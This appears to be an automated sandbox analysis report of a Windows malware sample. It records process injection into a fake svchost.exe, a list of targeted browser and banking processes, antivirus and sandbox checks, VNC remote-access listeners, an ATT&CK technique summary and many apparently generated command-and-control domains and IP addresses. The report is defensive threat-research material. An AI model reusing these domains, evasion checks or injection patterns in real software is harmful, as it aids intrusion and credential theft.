Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 27F5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2F52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2FA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 10B2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1105000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 26F2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2745000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2A35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2920000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2921000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2922000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2975000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2000000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2001000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2002000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2055000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2960000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2961000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2962000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 29B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2240000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2241000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2242000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2295000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3060000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3061000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 3062000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 30B5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1010000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1011000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1012000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 1065000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 28C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2915000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2530000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe base: 2531000Jump to behavior
Source: C:\Windows\apppatch\svchost.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 2_2_02BC78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 5_2_006A78A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex 6_2_014E78A0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File opened: CA HIPS KmxAgent
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Window found: AVP NULL ____AVP.Root
Source: C:\Windows\apppatch\svchost.exe File opened: CA HIPS KmxAgent
Source: C:\Windows\apppatch\svchost.exe File opened: Agnitum Outpost firewal \pipe\acsipc_server
Source: C:\Windows\apppatch\svchost.exe File opened: Webroot PREVX C:\ProgramData\PrevxCSI\csidb.csi
Source: C:\Windows\apppatch\svchost.exe File opened: AVG C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Source: C:\Windows\apppatch\svchost.exe Window found: AVP NULL ____AVP.Root
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: OjKmJJm2YT.exe, OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: OjKmJJm2YT.exe, 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, OjKmJJm2YT.exe, 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comavast.comkasperskydrwebeset.comantiviraviravirustotalvirusinfoz-oleg.comtrendsecureanti-malware.comodo.comgoogle.comgoogle.comDnsapi.dllDnsQuery_ADnsQuery_UTF8DnsQuery_WQuery_Mainws2_32.dllgetaddrinfogethostbynameinet_addrqwrtpsdfghjklzxcvbnmeyuioa1676d5775e05c50b46baa5579d4fc7;%s%sMozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)/login.php6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9100016d3ad29879a90b4dd1b4f76e82166ca3T2data.txt\*.*...\ntdll.dllZwQuerySystemInformationGlobal\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}fuckGlobal\HighMemoryEvent_%08xexplorer.exeShell_TrayWnd
Source: nFjEHtbDTFjy.exe, 00000005.00000000.1672940579.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000006.00000000.1673693057.0000000001901000.00000002.00000001.00040000.00000000.sdmp, nFjEHtbDTFjy.exe, 00000007.00000000.1674971269.0000000001541000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Code function: 0_2_00414050 cpuid 0_2_00414050
Source: C:\Windows\apppatch\svchost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\apppatch\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BC6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,IsUserAnAdmin,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep,2_2_02BC6970
Source: C:\Users\user\Desktop\OjKmJJm2YT.exe, Code function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
Source: OjKmJJm2YT.exe, Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

Source: OjKmJJm2YT.exe, String found in binary or memory: RFB 003.006
Source: svchost.exe, String found in binary or memory: RFB 003.006
Source: nFjEHtbDTFjy.exe, String found in binary or memory: RFB 003.006
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BC9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,2_2_02BC9E40
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BE1250 htons,socket,setsockopt,closesocket,bind,listen,2_2_02BE1250
Source: C:\Windows\apppatch\svchost.exe, Code function: 2_2_02BE0480 setsockopt,htons,socket,setsockopt,bind,2_2_02BE0480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 5_2_006C1250 htons,socket,setsockopt,closesocket,bind,listen,5_2_006C1250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 5_2_006C0480 setsockopt,htons,socket,setsockopt,bind,5_2_006C0480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 5_2_006A9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_006A9E40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 6_2_01501250 htons,socket,setsockopt,closesocket,bind,listen,6_2_01501250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 6_2_01500480 setsockopt,htons,socket,setsockopt,bind,6_2_01500480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe, Code function: 6_2_014E9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_014E9E40
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: 2 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: 1 DLL Side-Loading; 1 Create Account; 1 Valid Accounts; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; 1 Bootkit; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 613 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: 1 Disable or Modify Tools; 1 Abuse Elevation Control Mechanism; 1 Obfuscated Files or Information; 31 Software Packing; 1 DLL Side-Loading; 322 Masquerading; 1 Valid Accounts; 151 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 613 Process Injection; 1 Bootkit
Credential Access: 111 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: 2 System Time Discovery; 1 Account Discovery; 1 System Network Connections Discovery; 2 File and Directory Discovery; 43 System Information Discovery; 1 Query Registry; 351 Security Software Discovery; 151 Virtualization/Sandbox Evasion; 13 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: 1 Remote Desktop Protocol; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: 1 Archive Collected Data; 1 Screen Capture; 111 Input Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: 4 Ingress Tool Transfer; 11 Encrypted Channel; 11 Non-Standard Port; 1 Remote Access Software; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
[Behavior graph] ID: 1507240; Sample: OjKmJJm2YT.exe; Startdate: 08/09/2024; Architecture: WINDOWS; Score: 100

Source | Detection | Scanner | Label | Link
OjKmJJm2YT.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
OjKmJJm2YT.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Windows\apppatch\svchost.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
C:\Windows\apppatch\svchost.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
                                                      69.162.80.55
                                                      truetrue
                                                        unknown
                                                        gtm-sg-6l13ukk0m05.qu200.com
                                                        103.150.11.230
                                                        truetrue
                                                          unknown
                                                          lymyxid.com
                                                          3.94.10.34
                                                          truetrue
                                                            unknown
                                                            qegyval.com
                                                            154.85.183.50
                                                            truetrue
                                                              unknown
                                                              gatyzoz.com
                                                              unknown
                                                              unknowntrue
                                                                unknown
                                                                lykygaj.com
                                                                unknown
                                                                unknowntrue
                                                                  unknown
                                                                  qedyxel.com
                                                                  unknown
                                                                  unknowntrue
                                                                    unknown
                                                                    qedyqup.com
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      qekyluv.com
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        gatyrez.com
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          vofybic.com
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            pujydag.com
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              vojykom.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                qetysuq.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  vonyzut.com
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    pufyjuq.com
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      pujytug.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        galyhiw.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          lykygun.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            vopymyc.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              gatyfaz.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                vojycit.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  lyvymej.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    lygyvar.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      purygiv.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        gahykeb.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          purymog.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            gadyzib.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              ganyqow.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                lyxysun.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  puzyjyg.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    vopydek.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      qexyfuq.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
